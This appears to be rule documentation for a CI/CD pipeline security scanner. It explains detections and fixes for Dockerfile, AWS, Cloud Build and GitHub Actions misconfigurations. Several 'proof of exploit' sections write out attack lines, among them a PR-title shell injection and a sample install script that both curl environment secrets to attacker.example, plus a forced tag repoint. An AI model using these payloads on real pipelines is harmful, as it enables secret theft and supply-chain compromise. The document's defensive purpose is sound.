How this is detected. Subsequent directives in the Dockerfile (COPY src dest, RUN writes, ADD …) resolve relative paths against the active WORKDIR. A WORKDIR /sys followed by COPY conf.txt config.txt writes into the kernel's sysfs surface, at best a build-time error, at worst a container-escape primitive that lets a compromised step manipulate cgroups, devices, or kernel config.
Recommendation. Move WORKDIR to a dedicated app directory (/app, /srv/app, /opt/<service>). System paths like /sys, /proc, /dev, /etc, / and the root home are not application directories, pointing the working dir at one means subsequent COPY / RUN writes target kernel-exposed namespaces or admin-only configuration.
Source: DF-014 in the Dockerfile provider.
DF-015: RUN grants world-writable permissions (chmod 777 / a+w) MEDIUM
Evidences: CC6.8 Controls prevent or detect the introduction of malicious software.
How this is detected. World-writable directories under / are an established container-escape vector: any compromised process running as non-root can drop a payload that root-owned daemons later execute. The rule fires on the literal 777, a+w, and a+rwx modes; the more conservative 775 and ugo+x are not flagged.
Recommendation. Replace chmod 777 <path> with the narrowest permissions the workload actually needs. chmod 755 is enough for executables under a read-only root filesystem; 640 or 600 for files the runtime user reads. a+w is almost always copy-pasted from a SO answer and almost never the correct fix.
Known false positives.
- Test fixtures or scratch builds that intentionally share a directory across multiple non-root users may legitimately use
777. Suppress with an ignore-file entry rather than weakening the rule.
Source: DF-015 in the Dockerfile provider.
DF-016: Image lacks OCI provenance labels LOW
Evidences: CC8.1 Changes to infrastructure, data, software, and procedures are authorized, designed, tested, approved, and implemented.
How this is detected. The OCI image-spec annotation set is a small de facto standard maintained by the OCI working group. Only image.source and image.revision are checked because they're the two whose absence makes incident response materially harder; image.title / image.description are nice-to-have but the rule doesn't fire on those.
Recommendation. Add a LABEL line carrying at least org.opencontainers.image.source (the URL of the source repo) and org.opencontainers.image.revision (the commit SHA built into the image). Most registries surface those fields in the UI and on manifest inspect, which closes the source-to-image gap that GHA-006 / SLSA Build-L2 provenance attestation also addresses.
Known false positives.
- A multi-stage build's intermediate stages don't need provenance labels, only the final image ships. The rule fires per Dockerfile, not per stage; suppress for files where the final
FROMis intentional throwaway scratch.
Source: DF-016 in the Dockerfile provider.
DF-017: ENV PATH prepends a world-writable directory MEDIUM 🔧 fix
Evidences: CC6.8 Controls prevent or detect the introduction of malicious software.
How this is detected. A writable PATH entry that comes before the system bins lets any process inside the container shadow ls, ps, apt-get, cat, etc. by dropping a binary of the same name into the writable dir. On a multi-tenant image, or any image where an exploit can reach the filesystem, this is a free privilege-escalation vector.
Recommendation. Don't put /tmp, /var/tmp, /dev/shm, or any other world-writable path in PATH ahead of the system binary directories. Drop those entries entirely, or place them at the tail (ENV PATH=/usr/bin:$PATH:/tmp) so legitimate binaries always shadow anything dropped into the writable dir at runtime.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: DF-017 in the Dockerfile provider.
DF-018: RUN chown rewrites ownership of a system path MEDIUM
Evidences: CC6.8 Controls prevent or detect the introduction of malicious software.
How this is detected. Recognises chown and chgrp invocations whose first non-flag path argument resolves under a system directory. The non-recursive case is also flagged because a single chown user /etc is just as harmful, the recursive flag matters for the size of the blast radius, not for whether it's wrong. Application paths under /opt, /srv, /var/lib/<app>, and /app are not flagged.
Recommendation. Don't chown system directories at build time. If the runtime user needs to own a workload-specific subtree, COPY --chown=<user>:<group> it into the image at the subtree root, or place the workload under a dedicated directory (e.g. /app, /srv/app) and chown only that path. Granting the runtime user write access to /etc, /usr, /sbin, or /lib lets a process exploit later steps to stage a binary the system trusts.
Source: DF-018 in the Dockerfile provider.
DF-019: COPY/ADD source path looks like a credential file HIGH 🔧 fix
Evidences: CC6.1 Logical access controls restrict entities to authorized system resources.
How this is detected. Fires on any COPY or ADD whose source basename is a well-known credential filename (id_rsa, .npmrc, .netrc, .env, terraform.tfvars, …) or whose path tail matches a canonical credential location (.aws/credentials, .docker/config.json, .kube/config). Files with private-key extensions (.pem, .key, .p12, .pfx, .jks) are also flagged. Globs are not expanded, the rule reads the literal source token.
Recommendation. Don't COPY credential files into an image. Anything baked into a layer is recoverable by anyone who can pull the image, even if a later step deletes the file. For build-time secrets (npm tokens, registry credentials, SSH deploy keys), use RUN --mount=type=secret,id=<name> so the value lives only for the duration of the step. For runtime secrets, mount them from the orchestrator (Kubernetes Secret, ECS task role, Vault sidecar) instead.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Known false positives.
- Empty placeholder files (
.envshipped as a template,config.jsoncarrying only public flags). Suppress with a brief.pipelinecheckignorerationale and prefer an explicit non-secret name (.env.example).
Source: DF-019 in the Dockerfile provider.
DF-020: ARG declares a credential-named build argument HIGH 🔧 fix
Evidences: CC6.1 Logical access controls restrict entities to authorized system resources.
How this is detected. Complements DF-006 (which flags an ENV/ARG with a literal credential-shaped value). This rule fires on the name alone, ARG NPM_TOKEN, ARG GITHUB_PAT, ARG DB_PASSWORD, even when no default is set, because BuildKit records the resolved value in the image's history the moment --build-arg supplies one. Names are matched via the same _primitives/secret_shapes regex used by the other secret-name rules.
Recommendation. Don't pass secrets through ARG. Build arguments are recorded in docker history whether the value comes from a default or from --build-arg at build time, so a credential-named ARG leaks the secret to anyone who can pull the image. Use RUN --mount=type=secret,id=<name> and feed the value with BuildKit's --secret flag, the secret never lands in a layer or in the build history.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Known false positives.
- An
ARGwhose name matches the regex but is a non-secret config knob (a counter-example likeARG TOKEN_LIMIT). Rare; rename or suppress the finding with a brief rationale.
Source: DF-020 in the Dockerfile provider.
EB-001: No EventBridge rule for CodePipeline failure notifications MEDIUM
Evidences: CC7.2 System components are monitored for anomalies indicative of malicious acts or failures.
How this is detected. Pipeline failure events are emitted to EventBridge automatically; the missing piece is a rule that pipes them to somewhere a human reads (SNS, Slack, PagerDuty). Without it, failures only surface via the CodePipeline console, which no one watches.
Recommendation. Create an EventBridge rule matching detail-type: 'CodePipeline Pipeline Execution State Change' and state: FAILED, and point it at an SNS topic or chat webhook. Without it, pipeline failures during an incident (a compromise triggering rollback, for example) go unnoticed.
Source: EB-001 in the AWS provider.
ECR-001: Image scanning on push not enabled HIGH
Evidences: CC6.8 Controls prevent or detect the introduction of malicious software.
How this is detected. scan-on-push runs a CVE check against the image's OS package layers at the moment it lands in ECR. Without it, an image with a known CVE deploys silently. The ECR basic scanner is free; ECR-007 covers the Inspector v2 enhanced scanner that adds language-ecosystem CVEs (npm, pip, gem).
Recommendation. Enable imageScanningConfiguration.scanOnPush on the repository. Consider also enabling Amazon Inspector continuous scanning for ongoing CVE detection against images already in the registry.
Source: ECR-001 in the AWS provider.
ECR-002: Image tags are mutable HIGH
Evidences: CC7.1 Detection procedures identify configuration changes that introduce vulnerabilities.
How this is detected. Mutable tags mean :latest, :v1.0, and :stable can be re-pushed silently, the same tag points to different image content over time. Pinning by digest (sha256:...) in deployment manifests is the only durable reference; IMMUTABLE on the repo enforces the property registry-side so a forgotten digest reference doesn't drift.
Recommendation. Set imageTagMutability=IMMUTABLE on the repository. Reference images by digest (sha256:...) in deployment manifests for strongest immutability guarantees.
Source: ECR-002 in the AWS provider.
ECR-003: Repository policy allows public access CRITICAL
Evidences: CC6.6 Boundary-protection measures restrict access from outside the system boundary.
How this is detected. A wildcard-principal repo policy means anyone on the internet can pull images. Sometimes intentional (a publicly-distributed base image), but should be a deliberate exposure, typically via the ECR Public registry rather than a private repo with a public policy. The default for build-output images should never be public.
Recommendation. Remove wildcard principals from the repository policy. Grant access only to specific AWS account IDs or IAM principals that require it.
Source: ECR-003 in the AWS provider.
ECR-007: Inspector v2 enhanced scanning disabled for ECR MEDIUM
Evidences: CC6.8 Controls prevent or detect the introduction of malicious software.
How this is detected. ECR-001's basic on-push scan covers OS-level packages, apt / yum / apk lineage. Most production CVE risk is in language ecosystems (npm, pip, gem, mvn) which the basic scanner ignores. Inspector v2 enhanced scanning closes that gap and runs continuously, so a CVE published two weeks after a build still surfaces against the deployed image.
Recommendation. Enable Amazon Inspector v2 for the ECR scan type on this account. Basic ECR scanning on-push only covers OS packages; Inspector v2 enhanced scanning adds language-ecosystem CVEs and runs continuously as new vulnerabilities are published.
Source: ECR-007 in the AWS provider.
GCB-001: Cloud Build step image not pinned by digest HIGH 🔧 fix
Evidences: CC8.1 Changes to infrastructure, data, software, and procedures are authorized, designed, tested, approved, and implemented.
How this is detected. Bare references (gcr.io/cloud-builders/docker) are treated as :latest by Cloud Build. Tag-only references (:20, :latest) count as unpinned. Only @sha256:… suffixes pass.
Recommendation. Pin every steps[].name image to an @sha256:<digest> suffix. gcr.io/cloud-builders/docker:latest is mutable; Google publishes new builder images frequently and the next build would pull whatever is current. Resolve the digest with gcloud artifacts docker images describe <ref> --format='value(image_summary.digest)' and pin it.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: GCB-001 in the Cloud Build provider.
GCB-002: Cloud Build uses the default service account HIGH
Evidences: CC6.1 Logical access controls restrict entities to authorized system resources.
How this is detected. The default Cloud Build service account historically held roles/cloudbuild.builds.builder plus project-level editor in many organisations. Even under the GCP April-2024 default-identity change, the default SA is still broader than what a single pipeline needs. Explicit serviceAccount: is required to pass.
Recommendation. Create a dedicated service account for the build, grant it only the roles the pipeline actually needs (roles/artifactregistry.writer, roles/storage.objectCreator for artifact upload, etc.), and set serviceAccount: projects/<PROJECT>/serviceAccounts/<NAME>@.... Leaving it unset falls back to the default Cloud Build SA, which accumulates roles over a project's lifetime and is routinely granted roles/editor.
Source: GCB-002 in the Cloud Build provider.
GCB-003: Secret Manager value referenced in step args HIGH
Evidences: CC6.2 New internal and external users are registered, authorized, and provisioned.
How this is detected. Detection patterns: literal projects/<n>/secrets/<name>/versions/... URIs, gcloud secrets versions access shell invocations, and $(gcloud secrets …) command substitutions in step args or entrypoint.
Recommendation. Map the secret under availableSecrets.secretManager[] with an env: alias, then reference it from each step via secretEnv: [ALIAS]. Avoid inline gcloud secrets versions access in args, the resolved plaintext lands in build logs.
Source: GCB-003 in the Cloud Build provider.
GCB-006: Dangerous shell idiom (eval, sh -c variable, backtick exec) HIGH
Evidences: CC6.8 Controls prevent or detect the introduction of malicious software.
How this is detected. Complements GCB-004 (dynamicSubstitutions + user substitution in args). GCB-006 fires on intrinsically risky shell idioms, eval, sh -c "$X", backtick exec, regardless of whether the substitution source is currently trusted.
Recommendation. Replace eval "$VAR" / sh -c "$VAR" / backtick exec with direct command invocation. Validate or allow-list any value that must feed a dynamic command at the boundary. In Cloud Build these idioms typically appear in args: [-c, ...] entries under a bash entrypoint.
Known false positives.
eval "$(ssh-agent -s)"and similareval "$(<literal-tool>)"bootstrap idioms are intentionally NOT flagged, the substituted command is literal, only its output is eval'd.
Source: GCB-006 in the Cloud Build provider.
GCB-007: availableSecrets references versions/latest MEDIUM 🔧 fix
Evidences: CC6.3 Access modifications (including revocation) are tracked and timely, CC7.1 Detection procedures identify configuration changes that introduce vulnerabilities.
How this is detected. versions/latest is documented as a rolling alias. A build run on Monday and a re-run on Tuesday can consume different secret bodies without any change to cloudbuild.yaml, breaking the reproducibility invariant that pinning protects.
Recommendation. Pin each availableSecrets.secretManager[].versionName to a specific version number (.../versions/7) rather than latest. Rotate by updating the number when a new version is promoted, not by silently publishing a new version that the next build pulls.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: GCB-007 in the Cloud Build provider.
GCB-008: No vulnerability scanning step in Cloud Build pipeline MEDIUM
Evidences: CC6.8 Controls prevent or detect the introduction of malicious software.
How this is detected. The detector matches tool names anywhere in the document, step images, args, or entrypoint strings. Container Analysis API scanning configured at the project level counts as compensating control but is out of scope for this YAML-only check; if you rely on it, suppress this rule via --checks.
Recommendation. Add a step that runs a vulnerability scanner, trivy, grype, snyk test, npm audit, pip-audit, osv-scanner, or govulncheck. In Cloud Build this typically looks like a step with name: aquasec/trivy or an entrypoint: bash step that invokes trivy image / grype <ref> on the built image.
Source: GCB-008 in the Cloud Build provider.
GCB-009: Artifacts not signed (no cosign / sigstore step) MEDIUM
Evidences: CC8.1 Changes to infrastructure, data, software, and procedures are authorized, designed, tested, approved, and implemented.
How this is detected. Silent-pass when the pipeline does not appear to produce artifacts (no docker push / gcloud run deploy / kubectl apply / etc. in any step). The detector matches cosign, sigstore, slsa-framework, and notation.
Recommendation. Add a signing step before images: is resolved, for example, a step with name: gcr.io/projectsigstore/cosign that runs cosign sign --yes <registry>/<repo>@<digest>. Pair with an attestation step (cosign attest --predicate sbom.json --type cyclonedx) so consumers can verify both the signature and the build provenance.
Source: GCB-009 in the Cloud Build provider.
GHA-001: Action not pinned to commit SHA HIGH 🔧 fix
Evidences: CC8.1 Changes to infrastructure, data, software, and procedures are authorized, designed, tested, approved, and implemented.
How this is detected. Every uses: reference should pin a specific 40-char commit SHA. Tag and branch refs (@v4, @main) can be silently moved to malicious commits by whoever controls the upstream repository, a third-party action compromise will propagate into the pipeline on the next run.
Recommendation. Replace tag/branch references (@v4, @main) with the full 40-char commit SHA. Use Dependabot or StepSecurity to keep the pins fresh.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Seen in the wild.
- tj-actions/changed-files compromise (CVE-2025-30066, March 2025): a malicious commit retagged behind
@v1/@v45shipped CI-secret exfiltration to roughly 23,000 repos that had pinned the action to a mutable tag instead of a commit SHA. - reviewdog/action-setup compromise (CVE-2025-30154, March 2025): same week, similar mechanism. Tag-pinned consumers auto-pulled the malicious version; SHA-pinned consumers were unaffected.
Proof of exploit.
Tag-pinned reference (vulnerable):
- uses: tj-actions/changed-files@v45
Attack: the upstream maintainer (or anyone who compromises
the upstream repo) force-moves the v45 tag to a malicious
commit:
git tag -f v45
git push --force origin v45
Every consumer's next workflow run pulls the new code
automatically, executing the attacker's payload with the
job's secrets and GITHUB_TOKEN in scope.
Safe: pin to a 40-char commit SHA (immutable):
- uses: tj-actions/changed-files@a284dc1 # v45.0.0
Source: GHA-001 in the GitHub Actions provider.
GHA-003: Script injection via untrusted context HIGH 🔧 fix
Evidences: CC6.8 Controls prevent or detect the introduction of malicious software.
How this is detected. Interpolating attacker-controlled context fields (PR title/body, issue body, comment body, commit message, discussion body, head branch name, github.ref_name, inputs.*, release metadata, deployment payloads) directly into a run: block is shell injection. GitHub expands ${{ ... }} BEFORE shell quoting, so any backtick, $(), or ; in the source field executes.
Recommendation. Pass untrusted values through an intermediate env: variable and reference that variable from the shell script. GitHub's expression evaluation happens before shell quoting, so inline ${{ github.event.* }} is always unsafe.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Seen in the wild.
- GitHub Security Lab disclosure (2020): a sweep of public Actions found dozens of widely-used workflows interpolating
github.event.issue.title/pull_request.titledirectly into shell. Any commenter or PR author could run arbitrary commands in the maintainer's CI. - Trail of Bits
pwn-requestresearch (2021): demonstrated the same primitive againstpull_request_targetworkflows where the runner has secrets and a write-scope token; one fork PR could exfiltrate every secret the workflow could see. Mitigation is the same: never interpolate context into shell, route throughenv:.
Proof of exploit.
Vulnerable: PR title interpolated straight into shell.
name: triage on: pull_request_target: types: [opened, edited] jobs: greet: runs-on: ubuntu-latest steps: - run: | echo "New PR: ${{ github.event.pull_request.title }}"
Attack: open a PR with the title:
# foo"; curl -X POST https://attacker.example/exfil \
-d "$(env | base64 -w0)"; echo "
GitHub expands ${{ ... }} BEFORE shell quoting, so the
title's " closes the echo string and the rest of the line
becomes shell. The pull_request_target trigger means the
runner already has secrets and a write-scope GITHUB_TOKEN,
so the curl exfils every secret the workflow can see.
Safe: route through env so the value is never interpolated
into the shell template:
- env:
PR_TITLE: ${{ github.event.pull_request.title }}
run: |
echo "New PR: $PR_TITLE"
Source: GHA-003 in the GitHub Actions provider.
GHA-004: Workflow has no explicit permissions block MEDIUM 🔧 fix
Evidences: CC6.1 Logical access controls restrict entities to authorized system resources.
How this is detected. Without an explicit permissions: block (either top-level or per-job), the GITHUB_TOKEN inherits the repository's default scope, typically write. A compromised step receives far more privilege than it needs.
Recommendation. Add a top-level permissions: block (start with contents: read) and grant additional scopes only on the specific jobs that need them.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Known false positives.
- Read-only / lint-only workflows that do not call any write-scoped API often pass without an explicit block because the default token scope on public repos is read. The rule defaults to MEDIUM confidence to reflect this.
Source: GHA-004 in the GitHub Actions provider.
GHA-005: AWS auth uses long-lived access keys MEDIUM 🔧 fix
Evidences: CC6.2 New internal and external users are registered, authorized, and provisioned, CC6.3 Access modifications (including revocation) are tracked and timely.
How this is detected. Long-lived AWS_ACCESS_KEY_ID / AWS_SECRET_ACCESS_KEY secrets in GitHub Actions can't be rotated on a fine-grained schedule and remain valid until manually revoked. OIDC with role-to-assume yields short-lived credentials per workflow run.
Recommendation. Use aws-actions/configure-aws-credentials with role-to-assume + permissions: id-token: write to obtain short-lived credentials via OIDC. Remove the static AWS_ACCESS_KEY_ID / AWS_SECRET_ACCESS_KEY secrets.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Known false positives.
- LocalStack and Moto integration tests set
AWS_ENDPOINT_URLto a localhost address and use the sentineltest/testaccess keys (the LocalStack convention). Those values can't authenticate against real AWS, so the rule auto-suppresses an env block that pairs a localhost endpoint with sentinel keys.
Source: GHA-005 in the GitHub Actions provider.
GHA-008: Credential-shaped literal in workflow body CRITICAL 🔧 fix
Evidences: CC6.2 New internal and external users are registered, authorized, and provisioned.
How this is detected. Every string in the workflow is scanned against a set of credential patterns (AWS access keys, GitHub tokens, Slack tokens, JWTs, Stripe, Google, Anthropic, etc., see --man secrets for the full catalog). A match means a secret was pasted into YAML, the value is visible in every fork and every build log and must be treated as compromised.
Recommendation. Rotate the exposed credential immediately. Move the value to an encrypted repository or environment secret and reference it via ${{ secrets.NAME }}. For cloud access, prefer OIDC federation over long-lived keys.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Known false positives.
- Test fixtures and documentation blobs sometimes embed credential-shaped strings (JWT samples, AKIAI... examples). The AWS canonical example
AKIAIOSFODNN7EXAMPLEis deliberately NOT suppressed, if it appears in a real workflow it almost always means a copy-paste from docs was never substituted. Defaults to LOW confidence.
Seen in the wild.
- Uber 2016 GitHub leak: an AWS access key embedded in a private GitHub repo was reachable to attackers who got at the repo and used it to download driver / rider PII for 57 million accounts. Credential-shaped literals in any source control system (public or private) are one credential-leak away from the same outcome.
- GitGuardian's annual State of Secrets Sprawl reports consistently find millions of fresh credential leaks per year across public commits, with a median time-to-revocation after disclosure of days, not minutes. Pinning secrets to
${{ secrets.* }}removes the artifact from source control entirely.
Proof of exploit.
Vulnerable: AWS access key pasted into the workflow body.
env: AWS_ACCESS_KEY_ID: AKIAIOSFODNN7EXAMPLE AWS_SECRET_ACCESS_KEY: wJalrXUtnnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
Attack chain:
1. Attacker clones/forks the repo or pulls from a public
mirror. The literal is in plain text — no credentials
needed to read it.
2. Attacker uses the key against the AWS account it
belongs to. With AmazonEC2FullAccess this is
immediate compute hijack; with broader IAM it is
full data exfiltration.
3. Even after rotation, every git revision and every
CI build log retains the value — pull-request
mirrors, logging back-ends, and forks all have to
be scrubbed.
Safe: reference a stored secret. The value never lives in
source control or build logs (GitHub redacts it from output).
env: AWS_ACCESS_KEY_ID: ${{ secrets.AWS_ACCESS_KEY_ID }} AWS_SECRET_ACCESS_KEY: ${{ secrets.AWS_SECRET_ACCESS_KEY }}
Better: use OIDC federation. No long-lived key exists.
permissions:
id-token: write
steps:
- uses: aws-actions/configure-aws-credentials@
Source: GHA-008 in the GitHub Actions provider.
GHA-012: Self-hosted runner without ephemeral marker MEDIUM
Evidences: CC6.6 Boundary-protection measures restrict access from outside the system boundary.
How this is detected. Self-hosted runners that don't tear down between jobs leak filesystem and process state. A PR-triggered job writes to /tmp; a subsequent prod-deploy job on the same runner reads it. The mitigation is the runner's --ephemeral mode, the runner exits after one job and re-registers fresh. The check looks for an ephemeral label on the runs-on value; without one, the runner is presumed reusable. Recognises all three runs-on shapes: string, list, and { group, labels } dict form.
Recommendation. Configure the self-hosted runner to register with --ephemeral (the runner exits after one job and is freshly registered), and add an ephemeral label so this check can verify it. Consider actions-runner-controller for ephemeral pools.
Known false positives.
- Organisations using actions-runner-controller (ARC), autoscaled pools, or vendor runner fleets often use labels like
arc-*,autoscaled-*, orephemeral-pool-*instead of a bareephemerallabel. The check only matches the literalephemeraltoken onruns-on; extend via a custom allow-prefix config if your fleet uses a different naming convention. Defaults to MEDIUM confidence.
Source: GHA-012 in the GitHub Actions provider.
GHA-014: Deploy job missing environment binding MEDIUM 🔧 fix
Evidences: CC8.1 Changes to infrastructure, data, software, and procedures are authorized, designed, tested, approved, and implemented.
How this is detected. Without an environment: binding, a deploy job can't be gated by required reviewers, deployment-branch policies, or wait timers. Any push to the triggering branch will deploy immediately.
Recommendation. Add environment: <name> to jobs that deploy. Configure required reviewers, wait timers, and branch-protection rules on the matching GitHub environment.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Known false positives.
- Integration-test jobs that run
terraform applyorkubectl applyagainst a local mock (LocalStack, Moto, kind, k3d) aren't real deploys. The rule auto-suppresses a step whose env carriesAWS_ENDPOINT_URLorKUBE_API_URLpointing at a localhost address.
Source: GHA-014 in the GitHub Actions provider.
GHA-016: Remote script piped to shell interpreter HIGH 🔧 fix
Evidences: CC6.8 Controls prevent or detect the introduction of malicious software.
How this is detected. Detects curl | bash, wget | sh, and similar patterns that pipe remote content directly into a shell interpreter inside a workflow. An attacker who controls the remote endpoint (or poisons DNS / CDN) gains arbitrary code execution in the CI runner.
Recommendation. Download the script to a file, verify its checksum, then execute it. Or vendor the script into the repository.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Known false positives.
- Established vendor installers (get.docker.com, sh.rustup.rs, bun.sh/install, awscli.amazonaws.com, cli.github.com, ...) ship via HTTPS from their own CDN and are idiomatic. This rule defaults to LOW confidence so CI gates can ignore them with --min-confidence MEDIUM; the finding still surfaces so teams that want cryptographic verification can audit.
Seen in the wild.
- Codecov Bash uploader compromise (April 2021): an attacker modified the codecov.io/bash uploader script (commonly fetched via
curl -s codecov.io/bash | bash) to exfiltrate environment variables from CI runners (AWS keys, GitHub tokens, signing keys) at thousands of customers for over two months before discovery. - Bitwarden / npm install scripts (CVE-2018-7536-class incidents): remote-script execution in CI is the same primitive. The attacker controls bytes the runner executes. Pinning a digest or hosting a vendored copy turns a perpetual ambient risk into a one-time review.
Proof of exploit.
Vulnerable: install script piped straight to bash.
steps: - run: curl -sL https://example.com/install.sh | bash
Attack: an attacker who controls the install.sh endpoint
(compromised CDN, expired domain, BGP hijack, account
takeover, or simply being the upstream maintainer with bad
intent) drops a payload that runs in the CI runner with
every secret available to the job:
#!/usr/bin/env bash
# legitimate-looking install actions...
# curl -X POST https://attacker.example/exfil \
-d "$(env)" -d "$(cat $GITHUB_TOKEN_FILE 2>/dev/null)"
The runner has no way to know the bytes changed.
Safe: download, verify a known-good digest, then execute.
steps: - run: | curl -sLo install.sh https://example.com/install.sh echo "abc123...expected_sha256 install.sh" | sha256sum -c bash install.sh
Source: GHA-016 in the GitHub Actions provider.
GHA-017: Docker run with insecure flags (privileged/host mount) CRITICAL 🔧 fix
Evidences: CC6.6 Boundary-protection measures restrict access from outside the system boundary.
How this is detected. Flags like --privileged, --cap-add, --net=host, or host-root volume mounts (-v /:/) in a workflow give the container full access to the runner, enabling container escape and lateral movement.
Recommendation. Remove --privileged and --cap-add flags. Use minimal volume mounts. Prefer rootless containers.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: GHA-017 in the GitHub Actions provider.
GHA-019: GITHUB_TOKEN written to persistent storage CRITICAL 🔧 fix
Evidences: CC6.1 Logical access controls restrict entities to authorized system resources.
How this is detected. Detects patterns where GITHUB_TOKEN is written to files, environment files ($GITHUB_ENV), or piped through tee. Persisted tokens survive the step boundary and can be exfiltrated by later steps, uploaded artifacts, or cache entries, turning a scoped credential into a long-lived one.
Recommendation. Never write GITHUB_TOKEN to files, artifacts, or GITHUB_ENV. Use the token inline via ${{ secrets.GITHUB_TOKEN }} in the step that needs it.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Proof of exploit.
Vulnerable: token written to a file that survives the
step boundary and lands in the upload-artifact bundle.
jobs:
build:
permissions: { contents: write, packages: write }
steps:
- run: echo "${{ secrets.GITHUB_TOKEN }}" > /tmp/token
- run: make build # writes /tmp/token
# into ./dist/
- uses: actions/upload-artifact@
Attack: any contributor (or, on public repos, anyone)
downloads the artifact:
gh run download -n build-output
cat build-output/tmp/token # full GITHUB_TOKEN
The token is scoped to the workflow's permissions block —
in this case write to contents and packages,
enough to push tampered binaries to GHCR or rewrite the
branch the workflow runs on. Composes with SCM-001
(unprotected default branch) into XPC-004's "open a PR,
fetch artifact, ship malicious binary" loop.
Other persistence patterns the rule catches:
echo "TOKEN=$GITHUB_TOKEN" >> $GITHUB_ENV
echo "::set-output name=tok::$GITHUB_TOKEN"
echo "$SECRET" | tee /tmp/cache/secret
Safe: use the token inline in the step that needs it; never
write it anywhere that survives the step's environment:
- run: gh release create v1.0.0 dist/*
env:
GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
Source: GHA-019 in the GitHub Actions provider.
GHA-020: No vulnerability scanning step MEDIUM
Evidences: CC6.8 Controls prevent or detect the introduction of malicious software.
How this is detected. Without a vulnerability scanning step, known-vulnerable dependencies ship to production undetected. The check recognises trivy, grype, snyk, npm audit, yarn audit, safety check, pip-audit, osv-scanner, and govulncheck.
Recommendation. Add a vulnerability scanning step, trivy, grype, snyk test, npm audit, pip-audit, or osv-scanner. Publish results so vulnerabilities surface before deployment.
Source: GHA-020 in the GitHub Actions provider.
GHA-023: TLS / certificate verification bypass HIGH 🔧 fix
Evidences: CC6.7 Data in transit is protected from unauthorized disclosure.
How this is detected. Detects patterns that disable TLS certificate verification: git config http.sslVerify false, NODE_TLS_REJECT_UNAUTHORIZED=0, npm config set strict-ssl false, curl -k, wget --no-check-certificate, PYTHONHTTPSVERIFY=0, and GOINSECURE=. Disabling TLS verification allows MITM injection of malicious packages, repositories, or build tools.
Recommendation. Remove TLS verification bypasses. Fix certificate issues at the source (install CA certificates, configure proper trust stores) instead of disabling verification.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: GHA-023 in the GitHub Actions provider.
GHA-024: No SLSA provenance attestation produced MEDIUM
Evidences: CC8.1 Changes to infrastructure, data, software, and procedures are authorized, designed, tested, approved, and implemented.
How this is detected. Provenance generation is distinct from signing. A signed artifact proves who published it; a provenance attestation proves where/how it was built. Consumers can then verify the build happened on a trusted runner, from a specific source commit, with known parameters. Without it, a leaked signing key forges identity but a leaked build environment also forges provenance. You need both for the SLSA L3 non-falsifiability guarantee.
Recommendation. Call slsa-framework/slsa-github-generator or actions/attest-build-provenance after the build step to emit an in-toto attestation alongside the artifact. cosign sign alone (covered by GHA-006) signs the artifact but doesn't record how it was built. SLSA Build L3 requires the provenance statement.
Source: GHA-024 in the GitHub Actions provider.
GHA-025: Reusable workflow not pinned to commit SHA HIGH
Evidences: CC8.1 Changes to infrastructure, data, software, and procedures are authorized, designed, tested, approved, and implemented.
How this is detected. A reusable workflow runs with the caller's GITHUB_TOKEN and secrets by default. If uses: org/repo/.github/workflows/release.yml@v1 resolves to an attacker-modified commit, their code executes with your repository's permissions. This is the same threat model as unpinned step actions (GHA-001) but over a different uses: surface.
Recommendation. Pin every jobs.<id>.uses: reference to a 40-char commit SHA (owner/repo/.github/workflows/foo.yml@<sha>). Tag refs (@v1, @main) can be silently repointed by whoever controls the callee repository.
Source: GHA-025 in the GitHub Actions provider.
GHA-026: Container job disables isolation via options: HIGH
Evidences: CC6.6 Boundary-protection measures restrict access from outside the system boundary.
How this is detected. GitHub-hosted runners execute container: jobs inside a Docker container the runner itself manages, normally a hardened, network-namespaced sandbox. options: is a free-text passthrough to docker run; a flag that breaks the sandbox (shares host network/PID, runs privileged, maps the Docker socket) turns the job into an RCE on the runner VM.
Recommendation. Remove --network host, --privileged, --cap-add, --user 0/--user root, --pid host, --ipc host, and host -v bind-mounts from container.options and services.*.options. If a build genuinely needs one of these, move it to a dedicated self-hosted pool with branch protection so the flag doesn't reach PR runs.
Source: GHA-026 in the GitHub Actions provider.
